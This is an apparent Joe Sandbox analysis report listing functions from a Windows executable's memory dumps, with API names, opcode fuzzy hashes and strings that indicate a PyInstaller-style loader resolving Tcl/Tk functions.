                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DeleteErrorFileLast
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2018770650-0
                                                                                                                                          • Opcode ID: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
                                                                                                                                          • Instruction ID: 4b0421820fad178809c2ecaa68f8e341e9f3864be609ba3a83d7c3101a9a2648
                                                                                                                                          • Opcode Fuzzy Hash: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
                                                                                                                                          • Instruction Fuzzy Hash: 02D0C930E19E0391E61867761D4513991A16F56F72F500630C02EC21D0FF2CA0491111
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00007FF61D328BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF61D322ABB), ref: 00007FF61D328C1A
                                                                                                                                          • _findclose.LIBCMT ref: 00007FF61D327FA9
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharMultiWide_findclose
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2772937645-0
                                                                                                                                          • Opcode ID: 86611e6ebc2e161ed5fe30ba56aa598d30f03ea69cc12a76f586bf5c99a3238f
                                                                                                                                          • Instruction ID: 26543a4b9b45c8d237e75dec72dd0557cd71f18e2a718f3018ae3879f573062d
                                                                                                                                          • Opcode Fuzzy Hash: 86611e6ebc2e161ed5fe30ba56aa598d30f03ea69cc12a76f586bf5c99a3238f
                                                                                                                                          • Instruction Fuzzy Hash: 37718DA2E18EC581EA11CB2CD5452FDA360F7A9B5CF54E321DB8C52592FF28E2D9C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                          • Opcode ID: 6b5c5ab8eeff71e39afe9fda2295d49407cb2b42678b128b0c7397afbf7fbff2
                                                                                                                                          • Instruction ID: b50baf1c241324d7d097d41cbbd370113edee5622936f121a624e651444426c4
                                                                                                                                          • Opcode Fuzzy Hash: 6b5c5ab8eeff71e39afe9fda2295d49407cb2b42678b128b0c7397afbf7fbff2
                                                                                                                                          • Instruction Fuzzy Hash: 4841D072A08B4193FA34DB2AE640279F3A1EB5BFA1F141131D68EC3690EF2CE402C751
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DirectoryErrorLastRemove
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 377330604-0
                                                                                                                                          • Opcode ID: bdc813d071ebcfd580e26e39c2a5fdf0ab8f113e1ff0d9792b57e541ecf83804
                                                                                                                                          • Instruction ID: af1a072ba8bbd46386be3409231d290dbd6d54c5a43d723c428e73d95df63d00
                                                                                                                                          • Opcode Fuzzy Hash: bdc813d071ebcfd580e26e39c2a5fdf0ab8f113e1ff0d9792b57e541ecf83804
                                                                                                                                          • Instruction Fuzzy Hash: AA418926D1DE8541EA119B34D5012FDA360FBAAB58F549232EF8D82193FF2CE5D8C340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _fread_nolock
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 840049012-0
                                                                                                                                          • Opcode ID: 514d917231b69e24eb94a28f6af1f2a08606151838e2f37d0c047eeab57b782d
                                                                                                                                          • Instruction ID: 85fb4243ed2095c81e3cf68c992dd8a83573673c912b046106d297b8ceaa6675
                                                                                                                                          • Opcode Fuzzy Hash: 514d917231b69e24eb94a28f6af1f2a08606151838e2f37d0c047eeab57b782d
                                                                                                                                          • Instruction Fuzzy Hash: F621A235F08A9295FA549A2269043BAE641BF46FE8F8C5430EE0D87786EE7DE501C240
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                          • Opcode ID: 991c086762b97ce1bf58a0820ab8ed553d2cc556ed1ebb985c1376564fde346c
                                                                                                                                          • Instruction ID: 5d8174890e54d2e927edb7d24380ddd69af5a34776da292737c3109950190444
                                                                                                                                          • Opcode Fuzzy Hash: 991c086762b97ce1bf58a0820ab8ed553d2cc556ed1ebb985c1376564fde346c
                                                                                                                                          • Instruction Fuzzy Hash: B6318F32A18F92A5F751EF56894137CA660AF46FB1F410235EA1E873D2EE7CF4418711
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                          • Opcode ID: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
                                                                                                                                          • Instruction ID: 02eb5df9f98dbc7240c09b3d85dcbd613bf7dc9155c681c168fe40337ce487a3
                                                                                                                                          • Opcode Fuzzy Hash: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
                                                                                                                                          • Instruction Fuzzy Hash: AF218C32E04B469AEB24CF64C5402ED73A0EB06B2CF44063AD62D87AD5EF38D586CB50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                          • Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                                                                                          • Instruction ID: 45d4e6d63bba9f75d0e06d76f3c15b3b1984432e4a32b1e97163fed777d5c3da
                                                                                                                                          • Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                                                                                          • Instruction Fuzzy Hash: 50118E71A1CF8195FE60DF519600279E2A0BF86FA0F444431EA8E8769AEF3CE440DB04
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                          • Opcode ID: 513e03f871098e076a65fb8bab8bb253d597a6200523e68a4e261718b8ca4e46
                                                                                                                                          • Instruction ID: 10dded35c0460b402d63efefa43f610784be5ba9bd68dcadf2fcd1a578f99a9f
                                                                                                                                          • Opcode Fuzzy Hash: 513e03f871098e076a65fb8bab8bb253d597a6200523e68a4e261718b8ca4e46
                                                                                                                                          • Instruction Fuzzy Hash: 17219232A18E8186EB618F18D5407B9B7A0EB86F64F144234EA5D876D9EF3DD405CB00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                          • Opcode ID: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                                                                                                          • Instruction ID: b091766b62a2ed90454f679e68dc4f15ce31a391a6b8445813e0207d48fe01df
                                                                                                                                          • Opcode Fuzzy Hash: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                                                                                                          • Instruction Fuzzy Hash: 3E01C031A08F5251EA04DF629A01069E691FF87FF0F088630EE6C97BDAEE3CE0118700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                          • Opcode ID: f73c62597e7360775599b130af8d7787deaeebf14f296c678ba137edcd315959
                                                                                                                                          • Instruction ID: 9de8a864c9966369bd289388c279b2f74a19c3faf50b92848d2cd1df0318ba0e
                                                                                                                                          • Opcode Fuzzy Hash: f73c62597e7360775599b130af8d7787deaeebf14f296c678ba137edcd315959
                                                                                                                                          • Instruction Fuzzy Hash: BD014070E0DE4260FE66EB656B41179E1A0AF42FB0F144638E91EC26D6FE6CF8418700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF61D33BAA6,?,?,?,00007FF61D33AC67,?,?,00000000,00007FF61D33AF02), ref: 00007FF61D33F2AD
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                          • Opcode ID: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
                                                                                                                                          • Instruction ID: 73c862ca9200226f937220f8363b3aad05e7b6b833c7d381ecf99fe1a703184d
                                                                                                                                          • Opcode Fuzzy Hash: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
                                                                                                                                          • Instruction Fuzzy Hash: 02F06D7EB09E06A1FE94D7A296112B9D7915F4BFA0F8C4430CD4EC63C2FE2DE8858610
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • RtlAllocateHeap.NTDLL(?,?,?,00007FF61D330E24,?,?,?,00007FF61D332336,?,?,?,?,?,00007FF61D333929), ref: 00007FF61D33DCFA
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                          • Opcode ID: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
                                                                                                                                          • Instruction ID: aaf85de6a973e18f70cc666f4478941090432bdf5208206e59760a88d1f57d3f
                                                                                                                                          • Opcode Fuzzy Hash: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
                                                                                                                                          • Instruction Fuzzy Hash: BCF05830B0AA4661FE54977ABA092B5E2905F86FB5F084630D82ECA2C1FE2DF4408210
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                          • Opcode ID: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
                                                                                                                                          • Instruction ID: 03a5b40f1d35b6091e4aad92b13484c26819e879ccb0aac8e1333c1c10c3baa6
                                                                                                                                          • Opcode Fuzzy Hash: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
                                                                                                                                          • Instruction Fuzzy Hash: 76E012F2E08F47A2FE16FAA04B825B991515F16F61F104430DA0ACA3C3FE1CF8499A61
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc
                                                                                                                                          • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                          • API String ID: 190572456-2208601799
                                                                                                                                          • Opcode ID: 08011e4291223f8c8b87355f84bdba84e3d11561fc99f88d49761070ad3606f6
                                                                                                                                          • Instruction ID: bfaab211570102cbb1d5fdf7eb899e74017691fc2b72c1e4c78893b90fb9c1f5
                                                                                                                                          • Opcode Fuzzy Hash: 08011e4291223f8c8b87355f84bdba84e3d11561fc99f88d49761070ad3606f6
                                                                                                                                          • Instruction Fuzzy Hash: 2DE1D274E2EF4391FE598B18B894174A3B1AF46FB4B985035C80E862A4FF7DB158D250
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                          • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                          • API String ID: 2446303242-1601438679
                                                                                                                                          • Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                                                                                                          • Instruction ID: 4085a2ea353987b08a0db83893bf0c34fb6999fca4db05a985fc2cc0526a4d9c
                                                                                                                                          • Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                                                                                                          • Instruction Fuzzy Hash: 8AA15A76608F8587E7188F22E49479AB370F789B94F504129DB9D43B24EF7EE164CB40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
